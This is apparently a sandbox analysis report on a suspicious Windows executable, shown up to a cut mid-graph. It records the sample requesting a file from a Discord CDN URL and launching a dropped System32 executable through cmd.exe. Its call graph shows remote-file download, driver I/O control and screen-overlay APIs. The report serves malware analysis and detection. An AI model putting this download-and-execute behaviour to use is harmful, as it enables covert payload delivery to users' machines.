                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: cdn.discordapp.com
                            Connection: Keep-Alive
                            Cookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000
                            2024-12-27 12:35:05 UTC627INHTTP/1.1 404 Not Found
                            Date: Fri, 27 Dec 2024 12:35:05 GMT
                            Content-Type: text/plain;charset=UTF-8
                            Content-Length: 36
                            Connection: close
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C%2FZUX%2BBE3akSylxAb9CToCJGmDjyAU3CHzntD4QmbR9Ddx5Okl3Hm9ggR2YTwkNsVVVRFUPFKQJLjy4qD7ZsuDF1cjTWP7woS2MtP7beWmDTSc1PDL%2BkS7cOxeDXZRLwKLUzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                            Server: cloudflare
                            CF-RAY: 8f8959347bbb42ea-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-27 12:35:05 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                            Data Ascii: This content is no longer available.


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:07:34:54
                            Start date:27/12/2024
                            Path:C:\Users\user\Desktop\gshv2.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\gshv2.exe"
                            Imagebase:0x7ff62c0a0000
                            File size:254'976 bytes
                            MD5 hash:27F0E3DBF939AE14775E062A8445F0E5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:07:34:54
                            Start date:27/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:07:34:59
                            Start date:27/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe
                            Imagebase:0x7ff6922f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:31.8%
                              Total number of Nodes:1964
                              Total number of Limit Nodes:5
                              execution_graph 10765 7ff62c0c5f50 __std_exception_copy 10943 7ff62c0c43d0 10945 7ff62c0c4444 10943->10945 10944 7ff62c0c4aa4 10945->10944 10946 7ff62c0bd930 21 API calls 10945->10946 10947 7ff62c0c46c4 10946->10947 10948 7ff62c0c3850 3 API calls 10947->10948 10949 7ff62c0c480f 10948->10949 10950 7ff62c0bd930 21 API calls 10949->10950 10950->10944 11186 7ff62c0a1450 11187 7ff62c0a1474 11186->11187 11188 7ff62c0a14cd 11186->11188 11189 7ff62c0cf320 6 API calls 11187->11189 11194 7ff62c0c60f0 ?_Xlength_error@std@@YAXPEBD 11188->11194 11192 7ff62c0a14bd 11189->11192 10951 7ff62c0c2bd5 10952 7ff62c0c2bda LoadCursorA SetCursor 10951->10952 10766 7ff62c0b1340 10767 7ff62c0b136e malloc memcpy 10766->10767 10769 7ff62c0b1516 free 10767->10769 10773 7ff62c0b13c3 10767->10773 10771 7ff62c0b1430 memchr 10772 7ff62c0b1452 memchr 10771->10772 10771->10773 10772->10773 10773->10769 10773->10771 11202 7ff62c0b1a40 11203 7ff62c0b1a9f 11202->11203 11204 7ff62c0b1a64 11202->11204 11205 7ff62c0b1ad7 OpenClipboard 11203->11205 11207 7ff62c0b1ac4 free 11203->11207 11218 7ff62c0cf7c8 EnterCriticalSection 11204->11218 11208 7ff62c0b1ae3 11205->11208 11209 7ff62c0b1aeb GetClipboardData 11205->11209 11207->11205 11210 7ff62c0b1b03 CloseClipboard 11209->11210 11211 7ff62c0b1b16 GlobalLock 11209->11211 11212 7ff62c0b1b7f GlobalUnlock CloseClipboard 11211->11212 11215 7ff62c0b1b2c 11211->11215 11216 7ff62c0b1b68 11215->11216 11217 7ff62c0b24b0 3 API calls 11215->11217 11216->11212 11217->11216 11222 7ff62c0cf7de 11218->11222 11219 7ff62c0cf7e3 LeaveCriticalSection 11222->11219 11223 7ff62c0cf874 11222->11223 11224 7ff62c0cf8a5 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 11223->11224 11225 7ff62c0cf888 11223->11225 11225->11224 10957 7ff62c0bddc0 10958 7ff62c0bde6e 10957->10958 10959 7ff62c0bddcd 10957->10959 10960 7ff62c0bd140 5 API calls 10959->10960 10961 7ff62c0bde1e 10960->10961 10962 7ff62c0bb930 20 API calls 10961->10962 10963 7ff62c0bde48 10962->10963 10963->10958 10964 7ff62c0b2200 3 API calls 10963->10964 10964->10958 9045 7ff62c0cfdbc 9046 7ff62c0cfdd5 __scrt_initialize_crt 9045->9046 9047 7ff62c0cff13 9046->9047 9048 7ff62c0cfddd __scrt_acquire_startup_lock 9046->9048 9233 7ff62c0d00d0 IsProcessorFeaturePresent 9047->9233 9050 7ff62c0cff1d 9048->9050 9055 7ff62c0cfdfb __scrt_release_startup_lock 9048->9055 9051 7ff62c0d00d0 9 API calls 9050->9051 9052 7ff62c0cff28 9051->9052 9054 7ff62c0cff30 _exit 9052->9054 9053 7ff62c0cfe20 9055->9053 9056 7ff62c0cfea6 _get_initial_narrow_environment __p___argv __p___argc 9055->9056 9059 7ff62c0cfe9e _register_thread_local_exe_atexit_callback 9055->9059 9065 7ff62c0ccfd0 URLDownloadToFileA 9056->9065 9059->9056 9062 7ff62c0cfed3 9063 7ff62c0cfed8 _cexit 9062->9063 9064 7ff62c0cfedd 9062->9064 9063->9064 9064->9053 9239 7ff62c0ce970 9065->9239 9068 7ff62c0ce970 8 API calls 9069 7ff62c0cd049 9068->9069 9070 7ff62c0ce970 8 API calls 9069->9070 9071 7ff62c0cd05d 9070->9071 9072 7ff62c0ce970 8 API calls 9071->9072 9073 7ff62c0cd071 9072->9073 9243 7ff62c0cee10 9073->9243 9078 7ff62c0cee70 11 API calls 9079 7ff62c0cd0ae 9078->9079 9080 7ff62c0cee70 11 API calls 9079->9080 9081 7ff62c0cd0c2 9080->9081 9253 7ff62c0ce910 9081->9253 9084 7ff62c0ce910 2 API calls 9085 7ff62c0cd0d6 9084->9085 9086 7ff62c0ce910 2 API calls 9085->9086 9087 7ff62c0cd0e0 9086->9087 9088 7ff62c0ce970 8 API calls 9087->9088 9089 7ff62c0cd0f3 9088->9089 9090 7ff62c0ce970 8 API calls 9089->9090 9091 7ff62c0cd107 9090->9091 9092 7ff62c0ce970 8 API calls 9091->9092 9093 7ff62c0cd118 9092->9093 9259 7ff62c0ceed0 9093->9259 9096 7ff62c0cee70 11 API calls 9097 7ff62c0cd147 9096->9097 9098 7ff62c0cee70 11 API calls 9097->9098 9099 7ff62c0cd158 9098->9099 9100 7ff62c0cee70 11 API calls 9099->9100 9101 7ff62c0cd16c 9100->9101 9102 7ff62c0ce910 2 API calls 9101->9102 9103 7ff62c0cd176 9102->9103 9104 7ff62c0ce910 2 API calls 9103->9104 9105 7ff62c0cd180 9104->9105 9106 7ff62c0ce910 2 API calls 9105->9106 9107 7ff62c0cd18d SleepEx 9106->9107 9266 7ff62c0ceba0 9107->9266 9112 7ff62c0cd25e GetStdHandle SetConsoleTextAttribute 9114 7ff62c0cd2ad 9112->9114 9113 7ff62c0cd2c9 9115 7ff62c0cdfa6 9113->9115 9123 7ff62c0cd2d7 9113->9123 9270 7ff62c0c5ef0 __acrt_iob_func 9114->9270 9116 7ff62c0ce910 2 API calls 9115->9116 9117 7ff62c0cdfaf 9116->9117 9119 7ff62c0ce910 2 API calls 9117->9119 9122 7ff62c0cdfb9 9119->9122 9120 7ff62c0cd2b5 SleepEx exit 9120->9113 9121 7ff62c0cd2ea SetConsoleTitleA GetLastError FormatMessageA GetStdHandle SetConsoleTextAttribute 9121->9123 9124 7ff62c0ce910 2 API calls 9122->9124 9123->9115 9123->9121 9125 7ff62c0c5ef0 2 API calls 9123->9125 9126 7ff62c0cdfc6 9124->9126 9127 7ff62c0cd383 Sleep system 9125->9127 9128 7ff62c0ce910 2 API calls 9126->9128 9134 7ff62c0cd3ab 9127->9134 9129 7ff62c0cdfd3 9128->9129 9130 7ff62c0ce910 2 API calls 9129->9130 9131 7ff62c0cdfe0 9130->9131 9133 7ff62c0ce910 2 API calls 9131->9133 9132 7ff62c0cd3b7 system 9132->9134 9135 7ff62c0cdfed 9133->9135 9134->9132 9136 7ff62c0cd3c9 FindWindowA GetWindowThreadProcessId GetWindowRect 9134->9136 9137 7ff62c0ce910 2 API calls 9135->9137 9138 7ff62c0cd4e4 GetStdHandle SetConsoleTextAttribute 9136->9138 9139 7ff62c0cd404 DeviceIoControl GetStdHandle SetConsoleTextAttribute 9136->9139 9140 7ff62c0cdffa 9137->9140 9141 7ff62c0cd539 9138->9141 9149 7ff62c0cd4a3 9139->9149 9142 7ff62c0ce910 2 API calls 9140->9142 9144 7ff62c0c5ef0 2 API calls 9141->9144 9143 7ff62c0ce004 9142->9143 9146 7ff62c0ce910 2 API calls 9143->9146 9148 7ff62c0cd543 Sleep system 9144->9148 9145 7ff62c0c5ef0 2 API calls 9145->9149 9147 7ff62c0ce011 9146->9147 9313 7ff62c0cf650 9147->9313 9283 7ff62c0ce7b0 9148->9283 9149->9145 9273 7ff62c0ce170 CreateThread RegisterClassExA 9149->9273 9276 7ff62c0cc890 Direct3DCreate9Ex 9149->9276 9154 7ff62c0cd564 FindWindowA GetWindowThreadProcessId GetWindowRect 9155 7ff62c0cd67f GetStdHandle SetConsoleTextAttribute 9154->9155 9156 7ff62c0cd59f DeviceIoControl GetStdHandle SetConsoleTextAttribute 9154->9156 9160 7ff62c0cd6d4 9155->9160 9164 7ff62c0cd63e 9156->9164 9161 7ff62c0c5ef0 2 API calls 9160->9161 9163 7ff62c0cd6de Sleep system GetWindowThreadProcessId GetWindowRect 9161->9163 9162 7ff62c0c5ef0 2 API calls 9162->9164 9165 7ff62c0cd803 GetStdHandle SetConsoleTextAttribute 9163->9165 9166 7ff62c0cd723 DeviceIoControl GetStdHandle SetConsoleTextAttribute 9163->9166 9164->9162 9167 7ff62c0ce170 10 API calls 9164->9167 9169 7ff62c0cc890 29 API calls 9164->9169 9168 7ff62c0cd858 9165->9168 9175 7ff62c0cd7c2 9166->9175 9167->9164 9171 7ff62c0c5ef0 2 API calls 9168->9171 9170 7ff62c0cd654 CreateThread CloseHandle 9169->9170 9285 7ff62c0ce300 9170->9285 9174 7ff62c0cd862 Sleep system GetWindowThreadProcessId GetWindowRect 9171->9174 9172 7ff62c0c5ef0 2 API calls 9172->9175 9176 7ff62c0cd987 GetStdHandle SetConsoleTextAttribute 9174->9176 9177 7ff62c0cd8a7 DeviceIoControl GetStdHandle SetConsoleTextAttribute 9174->9177 9175->9172 9178 7ff62c0ce170 10 API calls 9175->9178 9180 7ff62c0cc890 29 API calls 9175->9180 9179 7ff62c0cd9dc 9176->9179 9186 7ff62c0cd946 9177->9186 9178->9175 9182 7ff62c0c5ef0 2 API calls 9179->9182 9181 7ff62c0cd7d8 CreateThread CloseHandle 9180->9181 9184 7ff62c0ce300 303 API calls 9181->9184 9185 7ff62c0cd9e6 Sleep system GetWindowThreadProcessId GetWindowRect 9182->9185 9183 7ff62c0c5ef0 2 API calls 9183->9186 9184->9165 9187 7ff62c0cdb0b GetStdHandle SetConsoleTextAttribute 9185->9187 9188 7ff62c0cda2b DeviceIoControl GetStdHandle SetConsoleTextAttribute 9185->9188 9186->9183 9189 7ff62c0ce170 10 API calls 9186->9189 9191 7ff62c0cc890 29 API calls 9186->9191 9190 7ff62c0cdb60 9187->9190 9197 7ff62c0cdaca 9188->9197 9189->9186 9192 7ff62c0c5ef0 2 API calls 9190->9192 9194 7ff62c0cd95c CreateThread CloseHandle 9191->9194 9196 7ff62c0cdb6a Sleep system GetWindowThreadProcessId GetWindowRect 9192->9196 9193 7ff62c0c5ef0 2 API calls 9193->9197 9195 7ff62c0ce300 303 API calls 9194->9195 9195->9176 9198 7ff62c0cdc8f GetStdHandle SetConsoleTextAttribute 9196->9198 9199 7ff62c0cdbaf DeviceIoControl GetStdHandle SetConsoleTextAttribute 9196->9199 9197->9193 9200 7ff62c0ce170 10 API calls 9197->9200 9202 7ff62c0cc890 29 API calls 9197->9202 9201 7ff62c0cdce4 9198->9201 9207 7ff62c0cdc4e 9199->9207 9200->9197 9203 7ff62c0c5ef0 2 API calls 9201->9203 9205 7ff62c0cdae0 CreateThread CloseHandle 9202->9205 9206 7ff62c0cdcee Sleep system GetWindowThreadProcessId GetWindowRect 9203->9206 9204 7ff62c0c5ef0 2 API calls 9204->9207 9208 7ff62c0ce300 303 API calls 9205->9208 9209 7ff62c0cdd33 DeviceIoControl GetStdHandle SetConsoleTextAttribute 9206->9209 9210 7ff62c0cde14 GetStdHandle SetConsoleTextAttribute 9206->9210 9207->9204 9211 7ff62c0ce170 10 API calls 9207->9211 9213 7ff62c0cc890 29 API calls 9207->9213 9208->9187 9218 7ff62c0cddd3 9209->9218 9212 7ff62c0cde69 9210->9212 9211->9207 9214 7ff62c0c5ef0 2 API calls 9212->9214 9216 7ff62c0cdc64 CreateThread CloseHandle 9213->9216 9217 7ff62c0cde73 Sleep system GetWindowThreadProcessId GetWindowRect 9214->9217 9215 7ff62c0c5ef0 2 API calls 9215->9218 9219 7ff62c0ce300 303 API calls 9216->9219 9217->9123 9220 7ff62c0cdeb8 DeviceIoControl GetStdHandle SetConsoleTextAttribute 9217->9220 9218->9215 9221 7ff62c0ce170 10 API calls 9218->9221 9222 7ff62c0cc890 29 API calls 9218->9222 9219->9198 9225 7ff62c0cdf57 9220->9225 9221->9218 9224 7ff62c0cdde9 CreateThread CloseHandle 9222->9224 9223 7ff62c0c5ef0 2 API calls 9223->9225 9226 7ff62c0ce300 303 API calls 9224->9226 9225->9223 9227 7ff62c0ce170 10 API calls 9225->9227 9228 7ff62c0cc890 29 API calls 9225->9228 9226->9210 9227->9225 9229 7ff62c0cdf6d CreateThread CloseHandle 9228->9229 9230 7ff62c0ce300 303 API calls 9229->9230 9230->9123 9231 7ff62c0d0228 GetModuleHandleW 9232 7ff62c0cfecf 9231->9232 9232->9052 9232->9062 9234 7ff62c0d00f6 9233->9234 9235 7ff62c0d0104 memset RtlCaptureContext RtlLookupFunctionEntry 9234->9235 9236 7ff62c0d013e RtlVirtualUnwind 9235->9236 9237 7ff62c0d017a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9235->9237 9236->9237 9238 7ff62c0d01fe 9237->9238 9238->9050 9240 7ff62c0ce991 9239->9240 9240->9240 9322 7ff62c0cea30 9240->9322 9244 7ff62c0cee6a 9243->9244 9245 7ff62c0cee33 9243->9245 9381 7ff62c0c60f0 ?_Xlength_error@std@@YAXPEBD 9244->9381 9367 7ff62c0cf320 9245->9367 9249 7ff62c0cd086 9250 7ff62c0cee70 9249->9250 9382 7ff62c0ce870 9250->9382 9252 7ff62c0cd09a 9252->9078 9254 7ff62c0ce923 9253->9254 9255 7ff62c0cd0cc 9253->9255 9256 7ff62c0ce947 9254->9256 9257 7ff62c0ce968 _invalid_parameter_noinfo_noreturn 9254->9257 9255->9084 9258 7ff62c0cfbf8 free 9256->9258 9258->9255 9260 7ff62c0ceef0 9259->9260 9261 7ff62c0cef28 9259->9261 9263 7ff62c0cf320 6 API calls 9260->9263 9410 7ff62c0c60f0 ?_Xlength_error@std@@YAXPEBD 9261->9410 9265 7ff62c0cd133 9263->9265 9265->9096 9267 7ff62c0cd1a1 system CreateThread URLDownloadToFileW 9266->9267 9268 7ff62c0ce830 9267->9268 9269 7ff62c0cd227 CreateFileW 9268->9269 9269->9112 9269->9113 9411 7ff62c0a1b80 9270->9411 9272 7ff62c0c5f22 __stdio_common_vfprintf 9272->9120 9274 7ff62c0ce201 7 API calls 9273->9274 9275 7ff62c0ce2ec exit 9273->9275 9274->9149 9277 7ff62c0cc8aa exit 9276->9277 9278 7ff62c0cc8b6 9276->9278 9277->9278 9412 7ff62c0a4f00 9278->9412 9280 7ff62c0cc970 QueryPerformanceFrequency 9281 7ff62c0cc98c QueryPerformanceCounter 9280->9281 9282 7ff62c0cc9a1 9280->9282 9281->9282 9284 7ff62c0ce7c0 9283->9284 9284->9154 9284->9284 9286 7ff62c0ce340 PeekMessageA 9285->9286 9287 7ff62c0ce380 GetForegroundWindow 9286->9287 9288 7ff62c0ce366 TranslateMessage DispatchMessageA 9286->9288 9289 7ff62c0ce3c3 GetAsyncKeyState 9287->9289 9290 7ff62c0ce38f GetWindow SetWindowPos 9287->9290 9288->9287 9291 7ff62c0ce633 exit 9289->9291 9292 7ff62c0ce3d6 GetClientRect ClientToScreen GetCursorPos GetAsyncKeyState 9289->9292 9290->9289 9778 7ff62c0c2c30 9291->9778 9301 7ff62c0ce47c 9292->9301 9295 7ff62c0ce66e 9295->9155 9296 7ff62c0ce4cf SetWindowPos 9296->9301 9297 7ff62c0ce763 PostQuitMessage exit 9298 7ff62c0ce691 9299 7ff62c0ce696 DefWindowProcA 9298->9299 9303 7ff62c0ce6a9 9298->9303 9299->9295 9301->9286 9301->9296 9306 7ff62c0ce545 9301->9306 9499 7ff62c0c9f80 9301->9499 9303->9295 9783 7ff62c0c2980 9303->9783 9678 7ff62c0a6770 9306->9678 9307 7ff62c0ce60b DestroyWindow 9309 7ff62c0cf650 8 API calls 9307->9309 9311 7ff62c0ce62d 9309->9311 9311->9155 9314 7ff62c0cf659 9313->9314 9315 7ff62c0ce022 9314->9315 9316 7ff62c0cff80 IsProcessorFeaturePresent 9314->9316 9315->9231 9317 7ff62c0cff98 9316->9317 10760 7ff62c0d0054 RtlCaptureContext 9317->10760 9323 7ff62c0cea54 memcpy 9322->9323 9329 7ff62c0cea75 9322->9329 9328 7ff62c0cd038 9323->9328 9324 7ff62c0ceb85 9359 7ff62c0c60f0 ?_Xlength_error@std@@YAXPEBD 9324->9359 9326 7ff62c0cead1 9345 7ff62c0cfc70 9326->9345 9328->9068 9329->9324 9329->9326 9331 7ff62c0ceac4 9329->9331 9332 7ff62c0ceafd 9329->9332 9330 7ff62c0ceb8a 9360 7ff62c0c6050 9330->9360 9331->9326 9331->9330 9334 7ff62c0ceb02 9332->9334 9335 7ff62c0ceb0f 9332->9335 9338 7ff62c0cfc70 4 API calls 9334->9338 9340 7ff62c0ceb12 memcpy 9335->9340 9337 7ff62c0ceb7e _invalid_parameter_noinfo_noreturn 9337->9324 9342 7ff62c0ceae6 9338->9342 9339 7ff62c0ceb90 9340->9328 9341 7ff62c0ceb33 9340->9341 9341->9337 9343 7ff62c0ceb58 9341->9343 9342->9337 9342->9340 9356 7ff62c0cfbf8 9343->9356 9346 7ff62c0cfc8a malloc 9345->9346 9347 7ff62c0cfc94 9346->9347 9348 7ff62c0cfc7b 9346->9348 9347->9342 9348->9346 9349 7ff62c0cfc9a 9348->9349 9350 7ff62c0cfca5 9349->9350 9363 7ff62c0d04d0 9349->9363 9352 7ff62c0c6050 Concurrency::cancel_current_task __std_exception_copy 9350->9352 9353 7ff62c0cfcab 9352->9353 9354 7ff62c0cfcce 9353->9354 9355 7ff62c0cfbf8 free 9353->9355 9354->9342 9355->9354 9357 7ff62c0d04a8 free 9356->9357 9361 7ff62c0c605e Concurrency::cancel_current_task 9360->9361 9362 7ff62c0c606f __std_exception_copy 9361->9362 9362->9339 9366 7ff62c0d04b0 9363->9366 9365 7ff62c0d04de _CxxThrowException 9366->9365 9368 7ff62c0cf370 9367->9368 9369 7ff62c0cf3f1 memcpy memcpy 9367->9369 9370 7ff62c0cf385 9368->9370 9371 7ff62c0cf3ca 9368->9371 9372 7ff62c0cf3dc 9368->9372 9369->9249 9373 7ff62c0cfc70 4 API calls 9370->9373 9371->9370 9374 7ff62c0cf43e 9371->9374 9375 7ff62c0cf3e1 9372->9375 9376 7ff62c0cf3eb 9372->9376 9379 7ff62c0cf39b 9373->9379 9378 7ff62c0c6050 Concurrency::cancel_current_task __std_exception_copy 9374->9378 9377 7ff62c0cfc70 4 API calls 9375->9377 9376->9369 9377->9379 9380 7ff62c0cf443 9378->9380 9379->9376 9383 7ff62c0ce88d 9382->9383 9384 7ff62c0ce8a3 memcpy 9383->9384 9385 7ff62c0ce8e8 9383->9385 9384->9252 9389 7ff62c0cf0f0 9385->9389 9390 7ff62c0cf11e 9389->9390 9391 7ff62c0cf26f 9389->9391 9393 7ff62c0cf17e 9390->9393 9396 7ff62c0cf171 9390->9396 9397 7ff62c0cf1aa 9390->9397 9409 7ff62c0c60f0 ?_Xlength_error@std@@YAXPEBD 9391->9409 9395 7ff62c0cfc70 4 API calls 9393->9395 9394 7ff62c0cf274 9398 7ff62c0c6050 Concurrency::cancel_current_task __std_exception_copy 9394->9398 9399 7ff62c0cf193 9395->9399 9396->9393 9396->9394 9397->9399 9401 7ff62c0cfc70 4 API calls 9397->9401 9402 7ff62c0cf27a 9398->9402 9400 7ff62c0cf228 _invalid_parameter_noinfo_noreturn 9399->9400 9403 7ff62c0cf22f memcpy memcpy 9399->9403 9404 7ff62c0cf1db memcpy memcpy 9399->9404 9400->9403 9401->9399 9405 7ff62c0ce8fb 9403->9405 9406 7ff62c0cf21b 9404->9406 9407 7ff62c0cf206 9404->9407 9405->9252 9408 7ff62c0cfbf8 free 9406->9408 9407->9400 9407->9406 9408->9405 9411->9272 9413 7ff62c0a4f17 9412->9413 9414 7ff62c0a4f1d malloc 9412->9414 9413->9414 9415 7ff62c0a4f4f 9414->9415 9417 7ff62c0a4f57 9414->9417 9426 7ff62c0a1c20 9415->9426 9422 7ff62c0a4fcb 9417->9422 9423 7ff62c0a5033 9417->9423 9418 7ff62c0a4ff9 9418->9280 9419 7ff62c0a5061 9420 7ff62c0a507e 9419->9420 9421 7ff62c0a5069 memcpy 9419->9421 9420->9280 9421->9420 9422->9418 9436 7ff62c0b25e0 9422->9436 9423->9419 9424 7ff62c0b25e0 3 API calls 9423->9424 9424->9419 9443 7ff62c0a28f0 9426->9443 9428 7ff62c0a1c58 9447 7ff62c0bad00 9428->9447 9434 7ff62c0a21f2 memset memset 9434->9417 9437 7ff62c0b25f5 malloc 9436->9437 9438 7ff62c0b2666 9436->9438 9437->9438 9440 7ff62c0b262c memcpy 9437->9440 9438->9418 9441 7ff62c0b2648 9440->9441 9442 7ff62c0b265a free 9440->9442 9441->9442 9442->9438 9444 7ff62c0a2950 9443->9444 9445 7ff62c0a29b8 memset 9444->9445 9446 7ff62c0a2c30 9445->9446 9446->9428 9446->9446 9448 7ff62c0bad33 9447->9448 9449 7ff62c0bad1b 9447->9449 9451 7ff62c0bad55 9448->9451 9469 7ff62c0b2680 9448->9469 9450 7ff62c0b25e0 3 API calls 9449->9450 9450->9448 9476 7ff62c0c1f10 9451->9476 9454 7ff62c0bad63 9455 7ff62c0bad95 9454->9455 9485 7ff62c0c2010 9454->9485 9457 7ff62c0badb8 9455->9457 9492 7ff62c0b2200 9455->9492 9459 7ff62c0a201e memset 9457->9459 9460 7ff62c0b2200 3 API calls 9457->9460 9461 7ff62c0c0270 9459->9461 9460->9459 9462 7ff62c0c02b0 9461->9462 9463 7ff62c0c028a free 9461->9463 9465 7ff62c0c02df 9462->9465 9466 7ff62c0c02cf free 9462->9466 9463->9462 9467 7ff62c0a2141 malloc 9465->9467 9468 7ff62c0c02fe free 9465->9468 9466->9465 9467->9434 9468->9467 9470 7ff62c0b2695 malloc 9469->9470 9472 7ff62c0b26ff 9469->9472 9470->9472 9473 7ff62c0b26ca memcpy 9470->9473 9472->9451 9474 7ff62c0b26e1 9473->9474 9475 7ff62c0b26f3 free 9473->9475 9474->9475 9475->9472 9477 7ff62c0c1ff6 9476->9477 9479 7ff62c0c1f2a 9476->9479 9477->9454 9478 7ff62c0c1fe4 9478->9454 9479->9478 9480 7ff62c0c1f69 malloc 9479->9480 9481 7ff62c0c1fc6 9480->9481 9482 7ff62c0c1f8c memcpy 9480->9482 9481->9454 9483 7ff62c0c1fba free 9482->9483 9484 7ff62c0c1fa8 9482->9484 9483->9481 9484->9483 9486 7ff62c0c2025 malloc 9485->9486 9487 7ff62c0c2091 9485->9487 9486->9487 9489 7ff62c0c205b memcpy 9486->9489 9487->9455 9490 7ff62c0c2085 free 9489->9490 9491 7ff62c0c2073 9489->9491 9490->9487 9491->9490 9493 7ff62c0b2215 malloc 9492->9493 9494 7ff62c0b2281 9492->9494 9493->9494 9496 7ff62c0b224b memcpy 9493->9496 9494->9457 9497 7ff62c0b2275 free 9496->9497 9498 7ff62c0b2263 9496->9498 9497->9494 9498->9497 9500 7ff62c0c9fc2 9499->9500 9501 7ff62c0c9fc7 GetClientRect QueryPerformanceCounter GetKeyState GetKeyState GetKeyState 9499->9501 9502 7ff62c0c2980 114 API calls 9500->9502 9503 7ff62c0ca0ce GetActiveWindow 9501->9503 9504 7ff62c0ca09f ClientToScreen SetCursorPos 9501->9504 9502->9501 9505 7ff62c0ca0ea GetCursorPos 9503->9505 9507 7ff62c0ca10d 9503->9507 9504->9503 9506 7ff62c0ca0f8 ScreenToClient 9505->9506 9505->9507 9506->9507 9508 7ff62c0ca156 9507->9508 9789 7ff62c0c2ad0 9507->9789 9510 7ff62c0ca186 GetCursorPos 9508->9510 9515 7ff62c0cc55d 9508->9515 9511 7ff62c0ca223 9510->9511 9795 7ff62c0bde90 9511->9795 9513 7ff62c0ca243 9803 7ff62c0c37d0 9513->9803 9889 7ff62c0a70a0 9515->9889 9518 7ff62c0ca41b 9521 7ff62c0c3de0 42 API calls 9518->9521 9519 7ff62c0ca389 9809 7ff62c0b2100 9519->9809 9523 7ff62c0ca3d7 9521->9523 9525 7ff62c0ca4d3 9523->9525 9526 7ff62c0ca565 9523->9526 9528 7ff62c0b2100 3 API calls 9525->9528 9527 7ff62c0c3de0 42 API calls 9526->9527 9529 7ff62c0ca521 9527->9529 9530 7ff62c0ca4fc 9528->9530 9532 7ff62c0ca61a 9529->9532 9533 7ff62c0ca6ac 9529->9533 9531 7ff62c0c3de0 42 API calls 9530->9531 9531->9529 9534 7ff62c0b2100 3 API calls 9532->9534 9535 7ff62c0c3de0 42 API calls 9533->9535 9536 7ff62c0ca643 9534->9536 9537 7ff62c0ca668 9535->9537 9538 7ff62c0c3de0 42 API calls 9536->9538 9539 7ff62c0ca76b 9537->9539 9540 7ff62c0ca7fd 9537->9540 9538->9537 9542 7ff62c0b2100 3 API calls 9539->9542 9543 7ff62c0c3de0 42 API calls 9540->9543 9545 7ff62c0ca794 9542->9545 9555 7ff62c0ca7b9 9543->9555 9548 7ff62c0c3de0 42 API calls 9545->9548 9548->9555 9549 7ff62c0cc86c 9550 7ff62c0cf650 8 API calls 9549->9550 9551 7ff62c0cc878 9550->9551 9551->9301 9552 7ff62c0cafe0 9553 7ff62c0cb635 9552->9553 9562 7ff62c0a7b60 11 API calls 9552->9562 9565 7ff62c0a7b60 11 API calls 9553->9565 9567 7ff62c0cbe02 9553->9567 9554 7ff62c0cc553 9867 7ff62c0a7e10 9554->9867 9555->9552 9828 7ff62c0a7b60 9555->9828 9558 7ff62c0cc79a 9558->9549 9561 7ff62c0c2980 114 API calls 9558->9561 9560 7ff62c0cc558 9877 7ff62c0ac370 9560->9877 9561->9549 9566 7ff62c0cb0d4 9562->9566 9563 7ff62c0c37d0 18 API calls 9568 7ff62c0ca952 9563->9568 9569 7ff62c0cb720 9565->9569 9570 7ff62c0c37d0 18 API calls 9566->9570 9567->9554 9571 7ff62c0a7b60 11 API calls 9567->9571 9839 7ff62c0c6b50 9568->9839 9572 7ff62c0c37d0 18 API calls 9569->9572 9573 7ff62c0cb0e0 9570->9573 9574 7ff62c0cbef8 9571->9574 9575 7ff62c0cb72c 9572->9575 9576 7ff62c0c37d0 18 API calls 9573->9576 9577 7ff62c0c37d0 18 API calls 9574->9577 9579 7ff62c0c37d0 18 API calls 9575->9579 9580 7ff62c0cb15a 9576->9580 9583 7ff62c0cbf04 9577->9583 9581 7ff62c0cb7a6 9579->9581 9582 7ff62c0c37d0 18 API calls 9580->9582 9585 7ff62c0c37d0 18 API calls 9581->9585 9586 7ff62c0cb1d3 9582->9586 9587 7ff62c0c37d0 18 API calls 9583->9587 9589 7ff62c0cb81f 9585->9589 9590 7ff62c0c37d0 18 API calls 9586->9590 9591 7ff62c0cbf7e 9587->9591 9593 7ff62c0c37d0 18 API calls 9589->9593 9594 7ff62c0cb250 9590->9594 9595 7ff62c0c37d0 18 API calls 9591->9595 9597 